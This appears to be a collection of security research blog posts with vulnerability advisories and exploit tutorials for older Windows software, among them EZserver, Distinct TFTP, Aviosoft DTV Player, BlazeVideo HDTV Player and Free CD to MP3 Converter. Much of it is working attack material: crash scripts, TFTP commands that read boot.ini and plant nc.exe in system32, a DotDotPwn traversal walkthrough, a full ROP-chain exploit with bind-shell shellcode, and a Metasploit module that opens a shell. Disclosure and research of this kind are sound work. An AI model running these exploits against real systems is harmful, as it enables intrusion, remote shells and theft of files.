EZserver version 6.4.017 or below contains a buffer overflow vulnerability which may possibly be exploited to cause a denial of service or arbitrary code execution.

Software Description

EZserver is a Video Server that stream Full HD to various devices.

Developer Website

http://www.ezhometech.com/ezserver.htm

Vulnerability Details

Buffer overflow condition exist in URL handling, sending long GET request to the server on port 8000
will cause server process to exit and may allow malicious code injection.
Further research found that the application does not care about the HTTP method,
so that by sending long characters to the port 8000 will make the program crash.

Vendor logs

06/11/2012 – Bug found
06/12/2012 – Vendor contacted
06/16/2012 – No response, advisory released.

Proof of Concept

#!/usr/bin/python

from socket import *
import sys

if len(sys.argv) != 3:
        print "[*] Proof of Concept of Ezserver <=6.4.017 Buffer Overflow"
        print "[*] by Spentera Research - research[at]spentera[dot]com"
        print "[*] http://www.spentera.com/resources/security-advisory\n"
        print "[*] Usage: python %s ip port" %sys.argv[0]
        sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])

junk = "\x41" * 10000
payload = junk

print "[!] Connecting to %s on port %d" % (host,port)
s = socket(AF_INET, SOCK_STREAM)

try:
        s.connect((host,port))
        print "[+] Launching attack.."
        s.send ("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")
        s.close()
except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

References

Exploit Database: http://www.exploit-db.com/exploits/19266/
Metasploit: http://www.metasploit.com/modules/exploit/windows/http/ezserver_http

The proof of concept of the vulnerability has been released on December 9, 2011, and no further announcement from CyberLink. I tried to coordinate the issue until they didn’t contact me anymore. A week after our last email, they updated the product, and  yes it’s Power2Go 8. How do they know that the product is safe without letting me to check again?

The application itself is still vulnerable to stack buffer overflow as we posted earlier here. This morning, a good friend from Metasploit, mr_me, sent me an email and asking why I didn’t get a shell from this POC. He also attached his working exploit script, and working flawlessly on Windows 7, awesome!

I stated him that I already managed to get a shell on Power2Go 7 (build 196), but can’t find any reliable jump address on Power2Go 8, because it’s a unicode stack overflow, you will face a very limited address regarding jump address. He submitted his working exploit to Metasploit Dev Team so it will be added to Metasploit as well.

So, here is the POC for Power2Go 7:
http://pastebin.com/CXJ5qsz6

Looking for Power2Go 8 exploit? Wait until mr_me’s pull request is accepted by the Metasploit team, it will automatically push to your Metasploit as well

We don’t have any information if the vulnerability is being exploited.

Overview

Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct. Corp. Distinct TFTP Server version 3.10 is susceptible to directory traversal attack. Attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.

Software Description

From Distinct website:

Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.

Vulnerability Details and Attack Vector

The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash (‘../’) sequences, which allows attackers to read or write arbitrary files.

By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).

Impact

A remote attacker may be able to leverage this vulnerability to gain access and has write access to system and other configuration files resulting in loss of confidentiality and integrity.

Proof of Concept

We assume that the directory is deep enough, so you have to set a deep path on the server configuration. If a GET request followed with ‘../../’ (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.10, the file will be retrieved successfully.

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp>

Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result:

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp>

Netcat successfully uploaded.

Another combinations:
tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe

Solution Status

Update to the latest version here

Risk Factor

CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score = 5.8
Risk factor = Medium

References

Original advisory: http://www.spentera.com/advisories/2012/SPN-01-2012.html

Exploit-DB advisory: http://www.exploit-db.com/exploits/18718/

Disclosure Timeline

March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory released

This is my experience when I was dealing with some applications which have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when I was doing a pentest on my client. So, let the experience tell you the story.

Quickshare File Server 1.2.1

First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.

Now, launch the DotDotPwn to attack the Quickshare File Server. Here are my attack commands:
bash-3.2# perl dotdotpwn.pl -m ftp -h 192.168.1.19 -O -s -U anonymous -P ‘ftp@mozilla.org’ -b

[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.19
[+] Detecting Operating System (nmap) …
[+] Operating System detected: Microsoft Windows Server 2003 SP1 or SP2
[+] Protocol: ftp
[+] Port: 21
[+] Service detected:
220 quickshare ftpd ready.

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 4656

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[+] Username: anonymous
[+] Password: ftp@mozilla.org
[+] Connecting to the FTP server at ’192.168.1.19′ on port 21
[+] FTP Server’s Current Path: /
[+] Local Path to download files: /pentest/fuzzers/dotdotpwn-v2.1/retrieved_files
[+] Press any key to continue

[+] Testing …
[*] Testing Path: ../boot.ini
[*] Testing Path: ../windows/system32/drivers/etc/hosts
[*] Testing Path: ../config.inc.php
[*] Testing Path: ../web.config
[*] Testing Path: ../../boot.ini
[*] Testing Path: ../../windows/system32/drivers/etc/hosts
[*] Testing Path: ../../config.inc.php
[*] Testing Path: ../../web.config

[*] CD ../../../ | GET boot.ini <== VULNERABLE

From the result above, we know that QuickShare File Server has a directory traversal vulnerability. You can download any file on the operating system that run Quickshare File Server as long as you know the exact path and the file you want to download.

DotDotPwn vs SSL

Ok, well.. it’s on a FTP protocol, what if it’s on FTPS or HTTPS? DotDotPwn, by default, cannot talk to a secure channel such as FTPS or HTTPS. When I was doing a pentest on a client, I was facing a web server with a SSL connection. Since the DotDotPwn cannot launch the attack on a FTPS or HTTPS protocol, we must trick the DotDotPwn to send the attack via a secure channel. How to do this?

You can use Stunnel to set the secure channel, and pass the DotDotPwn to this secure channel made by Stunnel and voila the attack will work properly. Of course you can use Burp as well, but this is just another option when you don’t have Burp on our machine (euh! why would a pentester won’t install Burp on their pentest machine?!)

Make some fun

Let’s have some fun with Stunnel and DotDotPwn, here I installed a vulnerable web application called Portix-CMS on Windows 2003 Server. I setup the Stunnel secure channel to accept a connection on port 8080 , the DotDotPwn will go through this port. Here is my stunnel configuration:

bash-3.2# cat stunnel.conf
cert = /opt/local/etc/stunnel/stunnel.pem
#Don’t forget to download a default cert.
#Some security enhancements for UNIX systems – comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 192.168.1.19:443

Note: Follow this HOWTO to create your own certificate, also please change your configuration to your own lab!

Now, we can run Stunnel:
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf

And test the connection to the HTTPS protocol:
bash-3.2# nc localhost 8080
HEAD /cms/ HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 18 Mar 2012 17:08:57 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=f05f1197ceadea3d2625d09da9bb49a3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: COMPTEURSIMPLE=Count; expires=Sun, 18-Mar-2012 18:09:01 GMT
Connection: close
Content-Type: text/html

We can see 200 OK, it means that our HTTPS connection via Stunnel is successfully established. Ok, next we will fire up the DotDotPwn against PortixCMS via Stunnel. Here is my setup (you can see DotDotPwn help to understand what i’m doing with those options)

bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) …
[+] Operating System detected:
[+] Protocol: http
[+] Port: 8080
[+] Service detected:
Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing “TRAVERSAL” with the traversals created and sending
. .
[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt

w00t! DotDotPwn works flawlessly. Now you can use this setup if you forgot to include Burpsuite on your pentest box

Have fun!

Aviosoft DTV Player is a multiple format video player application. Aviosoft DTV Player 1.0.1.2 and possibly earlier versions fail to properly handle malformed user-supplied data within a playlist (.plf) file before copying it into an insufficiently sized buffer, resulting in a buffer overflow.

Software Description
Aviosoft DTV Player is a multi-media center combines TV/video/DVD playback, video recording, media converting, FM radios connecting in one intelligent program. Aviosoft DTV Player allows users to watch free-to-air TV shows and analog TV shows. Fully supports TV card with BDA interface, stably run with DVB-T, DVB-S, DVB-S2, ATSC, ISDB-T, ISDB-S, CMMB, DMB-T/H TV-tuner.

Vulnerability Details
The main program AviosoftDTV.exe is prone to a remote memory-corruption vulnerability because the application fails to handle malformed playlist files (.plf). When the program try to load specially-crafted .plf file, it fails to perform boundary checking of the user input file, thus overwriting the Structured Exception Handling chain. This can be bypassed by overwrite the SE Handler address and pass the execution to EIP. Since we can control EIP, arbitrary code can be introduced and lead us to code execution.

Attacker can use this vulnerability to exploit user without prior knowledge via SMB or WebDAV share, instead of bring the specially-crafted file directly.

Below is the dump result when the exception occured:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00001237 ebx=03530318 ecx=000000a3 edx=03537a2c esi=035389d4 edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010217
*** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll -
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> d fs:[0]
003b:00000000 bc f3 12 00 00 00 13 00-00 f0 11 00 00 00 00 00 ................
003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................
003b:00000020 4c 05 00 00 50 05 00 00-00 00 00 00 00 00 00 00 L...P...........
003b:00000030 00 a0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040 c0 02 d8 e1 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0:000> d 0012f3bc
0012f3bc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f3cc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f3dc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f3ec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f3fc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f40c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f41c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012f42c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> g
(54c.550): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012ec68 ebp=0012ec88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x41414100:
41414141 ?? ???

Proof of Concept
Here is the proof of concept:
#!/usr/bin/python
filename = 'test.plf'
junk = "A" * 4000
f = open(filename,'w')
f.write(junk)
print "Malformed",filename,"created successfully."
f.close()

full exploit: http://www.exploit-db.com/exploits/18096

Solution
Unpatched

Discovered by
Tom Gregory from Spentera Research.

References
http://www.kb.cert.org/vuls/id/998403
http://www.spentera.com/2011/11/aviosoft-dtv-player-1-x-stack-buffer-overflow/
http://www.exploit-db.com/exploits/18096

PDF Version can be downloaded here

#HEX Generator
#http://www.digital-echidna.org
#0x04112011

def gene():
        c=0
        x=0
        hslgen='"'
        while x <= 255:
          hslhex=hex(x)
          if c == 16:
            hslgen=hslgen+'"\n"'
            c=0
          if x <= 16:
            hslgen=hslgen.replace('0x','\\x0')
          hslgen=hslgen+hslhex
          x+=1
          c+=1

        print "\n#Generated with dE HEX Generator"
        print "#http://www.digital-echidna.org\n"
        print hslgen.replace('0x','\\x')+'"\n'

if __name__ == "__main__":
        gene()

Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal.
Take a look at mona.py awesome tool developed by corelanc0d3r and his team
So here is the poc, it will bind to port 31337

#!/usr/bin/python

import struct
file = 'blazevideo-universal.plf'

totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
seh = '\x4a\x53\x30\x61'	# ADD ESP,800 # RETN
rop = '\x03\x60\x32\x61' * 10	# RETN (ROP NOP)
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\x08\x11\x01\x10'	# ptr to &VirtualProtect()
rop+= '\x03\x05\x01\x64'	# PUSH EDX # POP EAX # POP ESI # RETN 
rop+= '\x41\x41\x41\x41'	# Filler
rop+= '\x9f\x94\x60\x61'	# MOV ECX,DWORD PTR DS:[EDX] # POP SOMETHING
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x18\x42\x60\x61'	# PUSH ECX # ADD AL,5F # XOR EAX,EAX
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\xa6\xd1\x03\x64'	# POP EBP # RETN
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x5A\x05\x61\x61'	# & push esp #  ret 0c
rop+= '\xA8\x3E\x32\x61'	# POP EAX # RETN
rop+= '\x9D\x79\x39\xA1'	# 0x00000501-> ebx
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7b\xd3\x63\x61'	# PUSH EAX # ADD AL,5E
rop+= '\x07\x68\x62\x61' 	# XOR EAX,EAX # RETN
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\xDC\x74\x39\xA1'	# 0x00000040-> edx
rop+= '\xfb\x07\x31\x61' 	# ADD EDX,EAX # MOV EAX,EDX
rop+= '\xc0\x1f\x60\x61'	# POP ECX # RETN
rop+= '\x40\x03\x35\x60'	# &Writable location
rop+= '\x07\x9e\x32\x61'	# POP EDI # RETN
rop+= '\x03\x60\x32\x61'	# RETN (ROP NOP)
rop+= '\x95\x65\x60\x61'	# POP EAX # RETN
rop+= '\x90\x90\x90\x90'	# nop
rop+= '\xF1\x0C\x62\x61'	# PUSHAD # RETN

nop = '\x90' * 32

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process, 

shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69")

sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

f = open(file,'w')
print "Author: modpr0be"
f.write(payload)
print "File",file, "successfully created"
f.close()

here is the result, tested on Windows 7 SP1:

You might be read about the previous post ScriptFTP Remote BOF, if you are a Metasploit user, you can add this exploit module to your Metasploit Framework.

UPDATE:
Metasploit has released their module for ScriptFTP. You can use it now on Metasploit. Thanks to:
Cyberheb < mrs[at]infosec-id.com >
Otoy < otoy[at]digital-echidna.org >
TecR0c < roccogiovannicalvi[at]gmail.com >
mr_me < steventhomasseeley[at]gmail.com >

Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit.

Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut:

junk = "\x41" * 4112                   # jumlah sampah yang dikirim
eip = "\x91\x3b\x43\x00"               # 0x00463b91 FFE4 JMP ESP at cdextract.exe
nops = "\x90" * 16
espdata = "\x90" * (5000 - len(junk+eip+nops)

Dulu saya melakukan proses exploit Free CD to MP3 Converter pada sistem Windows XP SP3 versi NIST FDCC (Federal Desktop Core Configuration), tapi kali ini saya melakukannya pada sistem Windows XP SP3 versi umum, seharusnya ini tidak akan menjadi masalah berarti karena alamat JMP ESP yang saya gunakan kali ini berasal dari module cdextract.exe.

Kita akan coba langsung meng-konversi exploit Free CD to MP3 Converter ke format Metasploit, dan akan saya jelaskan bagian-bagian yang penting. Karena proses eksploitasi Free CD to MP3 Converter menggunakan sebuah file wav (sehingga dikategorikan sebagai file format exploit), maka kita akan menggunakan salah satu exploit dari Metasploit sebagai template, yaitu a-pdf_wav_to_mp3.rb terdapat pada direktori /opt/framework/msf3/modules/exploits/windows/fileformat/

##
# $Id: a-pdf_wav_to_mp3.rb 12196 2011-04-01 00:51:33Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote         Rank = NormalRanking         include Msf::Exploit::FILEFORMAT         include Msf::Exploit::Remote::Seh         def initialize(info = {})                 super(update_info(info,                         'Name'           => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When
                                the application is used to import a specially crafted m3u file, a buffer overflow occurs
                                allowing arbitrary code execution.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'd4rk-h4ck3r', # Original Exploit
                                        'Dr_IDE',      # SEH Exploit
                                        'dookie'       # MSF Module
                                ],
                        'Version'        => '$Revision: 12196 $',
                        'References'     =>
                                [
                                        [ 'OSVDB', '67241' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/14681/' ]
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'seh',
                                        'DisablePayloadHandler' => 'true',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 600,
                                        'BadChars' => "\x00\x0a",
                                        'StackAdjustment' => -3500
                                },
                        'Platform' => 'win',
                        'Targets'        =>
                                [
                                        [ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ],     # p/p/r in wavtomp3.exe
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => 'Aug 17 2010',
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
                        ], self.class)

        end

        def exploit

                sploit = rand_text_alpha_upper(target['Offset'])
                sploit << generate_seh_payload(target.ret)

                print_status("Creating '#{datastore['FILENAME']}' file ...")

                file_create(sploit)

        end

end

Bagian yang perlu diperhatikan adalah:

• bagian include Msf::Exploit::FILEFORMAT, menandakan bahwa exploit ini termasuk dalam fileformat exploit.
• bagian Payload, yang berisi space, badchars, dll
• bagian Targets, yang berisi offset
• bagian def exploit, yang berisi urutan eksploitasi.

Mari kita gabungkan informasi yang kita miliki diawal kedalam contoh exploit yang sudah ada.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote         Rank = NormalRanking         include Msf::Exploit::FILEFORMAT         def initialize(info = {})                 super(update_info(info,                         'Name'           => 'Free CD to MP3 Converter 3.1 Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow in Free CD to MP3 Converter 3.1. When
                                the application is used to import a specially crafted wav file, a buffer overflow occurs
                                allowing arbitrary code execution.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'C4SS!0 G0M3S', # Original Exploit
                                        'modpr0be'       # MSF Module
                                ],
                        'References'     =>
                                [
                                        [ 'OSVDB', '69116' ],
                                        [ 'URL', 'http://www.exploit-db.com/exploits/15480/' ],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        'DisablePayloadHandler' => 'true',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 800,
                                        'BadChars' => "\x00\x0a\x1a\x0f",
                                        'StackAdjustment' => -3500
                                },
                        'Platform' => 'win',
                        'Targets'        =>
                                [
                                        [ 'Windows XP Universal', { 'Ret' => 0x00463B91, 'Offset' => 4112 } ],    # jmp esp in cdextract.exe
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 10 2010',
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
                        ], self.class)
        end

        def exploit
                sploit = rand_text_alpha(target['Offset'])
                sploit << [target.ret].pack('V')
                sploit << make_nops(32)
                sploit << payload.encoded
                sploit << make_nops(5000 - (payload.encoded.length))
                print_status("Creating '#{datastore['FILENAME']}' file ...")
                file_create(sploit)
        end
end

Pada bagian Target, saya mengisi dengan Windows XP Universal, lalu dengan informasi berikut:

 'Targets'        =>
                                [
                                        [ 'Windows XP Universal', { 'Ret' => 0x00463B91, 'Offset' => 4112 } ],

Ret => 0x00463B91 adalah perintah JMP ESP yang akan menimpa EIP.
Offset => 4112 adalah jumlah offset yang dicapai untuk menimpa EIP

Lalu bagian paling penting:

def exploit
     sploit = rand_text_alpha(target['Offset'])
     sploit << [target.ret].pack('V')
     sploit << make_nops(32)
     sploit << payload.encoded
     sploit << make_nops(5000 - (payload.encoded.length))
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(sploit)
end

Bagian rand_text_alpha(target['Offset'] adalah function dari Metasploit untuk men-generate sejumlah karakter alphanumeric sesuai dengan Offset yang telah kita tentukan di option Target sebelumnya.
Setelah offset memenuhi stack dengan jumlah 4112 bytes, maka kita juga sudah tahu bahwa setelah itu EIP akan tertimpa sebanyak 4 bytes, sehingga option berikutnya [target.ret].pack('V') memanggil alamat Ret => 0x00463B91 yang telah kita tentukan sebelumnya dan segera menimpa EIP.
Setelah itu make_nops(32) akan menciptakan NOPSled sebanyak 32 bytes agar menjadi ‘landasan kosong’ sebelum mencapai shellcode.
Bagian berikutnya, payload.encoded adalah function dari Metasploit untuk men-generate payload yang biasa kita gunakan pada Metasploit (misal: set payload windows/shell_bind_tcp). Terakhir, saya menambahkan Nopsled untuk melengkapi buffer yang saya kirim sebelumnya sebanyak 5000 bytes. Lalu function file_create(sploit) menulis variable sploit dan menciptakan file msf.wav.

Simpan file diatas dengan nama freecdmp3_wav.rb dan copy ke folder /opt/framework/msf3/modules/exploits/windows/fileformat/ agar dapat digunakan oleh Metasploit. Berikut penggunaannya pada msfconsole:

       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 738 exploits - 376 auxiliary - 82 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13774 updated yesterday (2011.09.22)

msf > use exploit/windows/fileformat/freecdmp3_wav
msf  exploit(freecdmp3_wav) > info

       Name: Free CD to MP3 Converter 3.1 Buffer Overflow
     Module: exploit/windows/fileformat/freecdmp3_wav
    Version: 0
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  C4SS!0 G0M3S
  modpr0be

Available targets:
  Id  Name
  --  ----
  0   Windows XP

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.wav          no        The file name.

Payload information:
  Space: 800
  Avoid: 4 characters

Description:
  This module exploits a buffer overflow in Free CD to MP3 Converter
  3.1. When the application is used to import a specially crafted wav
  file, a buffer overflow occurs allowing arbitrary code execution.

References:

http://www.osvdb.org/69116


http://www.exploit-db.com/exploits/15480/

msf  exploit(freecdmp3_wav) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf  exploit(freecdmp3_wav) > set lport 4321
lport => 4321
msf  exploit(freecdmp3_wav) > exploit 

[*] Creating 'msf.wav' file ...
[*] Generated output file /home/tom/.msf4/data/exploits/msf.wav
msf  exploit(freecdmp3_wav) >

Dan ketika di load oleh program Free CD to MP3 Converter, sekilas program akan terlihat ‘hang’ tapi jika kita lihat melalui netstat:

listening on port 4321

Dan ketika kita melakukan koneksi ke port tersebut:

nc to port 4321

